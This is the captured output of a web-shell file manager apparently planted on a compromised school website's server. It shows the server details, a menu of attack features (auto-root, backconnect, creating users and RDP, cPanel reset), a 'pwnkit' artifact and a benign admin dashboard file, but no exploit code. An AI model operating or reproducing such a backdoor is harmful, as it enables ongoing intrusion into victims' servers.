Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.191.178.16
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
kaleke /
myadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
Curriculum
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
build
[ DIR ]
drwxrwxrwx
cbse
[ DIR ]
drwxrwxrwx
dist
[ DIR ]
drwxrwxrwx
file
[ DIR ]
drwxrwxrwx
gallery
[ DIR ]
drwxrwxrwx
news-coverage
[ DIR ]
drwxrwxrwx
pdf
[ DIR ]
drwxrwxrwx
photo
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
slider
[ DIR ]
drwxrwxrwx
sym
[ DIR ]
drwxrwxrwx
tc
[ DIR ]
drwxrwxrwx
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
Gruntfile.js
6.85
KB
-rwxrwxrwx
add-album.php
1.75
KB
-rwxrwxrwx
add-cbse-corner.php
2.18
KB
-rwxrwxrwx
add-fee.php
3.9
KB
-rwxrwxrwx
add-gallery.php
3.1
KB
-rwxrwxrwx
add-news.php
2.68
KB
-rwxrwxrwx
add-pages.php
2.2
KB
-rwxrwxrwx
add-pdf.php
2.19
KB
-rwxrwxrwx
add-slide.php
2.22
KB
-rwxrwxrwx
add-tc.php
2.43
KB
-rwxrwxrwx
album.php
3.98
KB
-rwxrwxrwx
cbse-corner.php
4.02
KB
-rwxrwxrwx
config.php
736
B
-rwxrwxrwx
error_log
11.02
KB
-rw-r--r--
fee.php
2.98
KB
-rwxrwxrwx
footer.php
8.81
KB
-rwxrwxrwx
gallery.php
4.1
KB
-rwxrwxrwx
header.php
9.43
KB
-rwxrwxrwx
index.php
3.93
KB
-rwxrwxrwx
log.php
1.15
KB
-rwxrwxrwx
login.php
5.74
KB
-rwxrwxrwx
logout.php
132
B
-rwxrwxrwx
news.php
4.29
KB
-rwxrwxrwx
pages.php
3.99
KB
-rwxrwxrwx
pdf.php
4.09
KB
-rwxrwxrwx
pwnkit
0
B
-rwxr-xr-x
register.php
3.09
KB
-rwxrwxrwx
slide.php
4.03
KB
-rwxrwxrwx
tc.php
840
B
-rwxrwxrwx
update-fee.php
4.51
KB
-rwxrwxrwx
update-news.php
2.96
KB
-rwxrwxrwx
update-pages.php
2.78
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include('header.php'); ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Dashboard <small>Control panel</small> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Dashboard</li> </ol> </section> <!-- Main content --> <section class="content"> <!-- Small boxes (Stat box) --> <div class="row"> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-aqua"> <div class="inner"> <h3>News </h3> <p>View Page</p> </div> <a href="news.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-green"> <div class="inner"> <h3>Gallery</h3> <p>View Page</p> </div> <a href="gallery.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-red"> <div class="inner"> <h3>Album</h3> <p>View Page</p> </div> <a href="album.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-yellow"> <div class="inner"> <h3>Pages</h3> <p>View Page</p> </div> <a href="pages.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> </div> <!-- /.row --> </section> <section class="content"> <!-- Small boxes (Stat box) --> <div class="row"> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-yellow"> <div class="inner"> <h3>Slide</h3> <p>View Page</p> </div> <a href="slide.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-red"> <div class="inner"> <h3>PDF</h3> <p>View Page</p> </div> <a href="pdf.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-green"> <div class="inner"> <h3>CBSE Corner</h3> <p>View Page</p> </div> <a href="cbse-corner.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> <div class="col-lg-3 col-xs-6"> <!-- small box --> <div class="small-box bg-aqua"> <div class="inner"> <h3>TC </h3> <p>View Page</p> </div> <a href="tc.php" class="small-box-footer">More info <i class="fa fa-arrow-circle-right"></i></a> </div> </div> <!-- ./col --> </div> <!-- /.row --> </section> </div> <?php include("footer.php");?>
Close